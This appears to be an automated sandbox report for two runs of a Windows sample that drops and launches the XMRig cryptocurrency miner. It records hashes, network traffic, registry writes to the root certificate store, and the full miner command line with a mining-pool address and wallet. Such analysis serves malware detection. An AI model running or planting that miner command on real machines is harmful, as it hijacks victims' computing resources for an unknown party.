memory/2804-22-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-25-0x000001BABCEA0000-0x000001BABCEC0000-memory.dmp
memory/2804-24-0x000001BABE770000-0x000001BABE790000-memory.dmp
memory/2804-23-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-26-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-27-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-28-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-29-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-30-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-31-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-32-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-33-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-34-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-35-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-36-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-37-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-38-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-39-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-40-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-41-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-42-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-43-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-44-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-45-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-46-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-47-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-48-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-49-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-50-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-51-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-52-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-53-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-54-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-55-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-56-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-57-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-58-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-59-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-60-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-61-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-62-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-63-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-64-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-65-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-66-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-67-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-68-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-69-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-70-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-71-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-72-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-73-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-74-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-75-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-76-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-77-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-78-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-79-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-80-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-81-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-82-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-83-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
memory/2804-84-0x00007FF7031D0000-0x00007FF703CD3000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-05-22 15:12
Reported
2024-05-22 16:33
Platform
win10v2004-20240508-en
Max time kernel
1795s
Max time network
1784s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2684 wrote to memory of 1044 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2684 wrote to memory of 1044 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| NL | 23.62.61.106:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.167.79.40.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1044-16-0x0000024836980000-0x00000248369A0000-memory.dmp
memory/1044-17-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-18-0x0000024836BE0000-0x0000024836C00000-memory.dmp
memory/1044-19-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-21-0x0000024836C20000-0x0000024836C40000-memory.dmp
memory/1044-20-0x0000024836C00000-0x0000024836C20000-memory.dmp
memory/1044-22-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-23-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-24-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-25-0x0000024836C00000-0x0000024836C20000-memory.dmp
memory/1044-26-0x0000024836C20000-0x0000024836C40000-memory.dmp
memory/1044-27-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-28-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-29-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-30-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-31-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-32-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-33-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-34-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-35-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-36-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-37-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-38-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-39-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-40-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-41-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-42-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-43-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-44-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-45-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-46-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-47-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-48-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-49-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-50-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-51-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-52-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-53-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-54-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-55-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-56-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-57-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-58-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-59-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-60-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-61-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-62-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-63-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-64-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-65-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-66-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-67-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-68-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-69-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-70-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-71-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-72-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-73-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-74-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-75-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-76-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-77-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-78-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-79-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-80-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-81-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-82-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-83-0x00007FF653D20000-0x00007FF654823000-memory.dmp
memory/1044-84-0x00007FF653D20000-0x00007FF654823000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-22 15:12
Reported
2024-05-22 16:22
Platform
win10v2004-20240508-en
Max time kernel
1797s
Max time network
1786s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3556 wrote to memory of 1980 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3556 wrote to memory of 1980 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| NL | 23.62.61.185:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.185:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.16.208.104.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
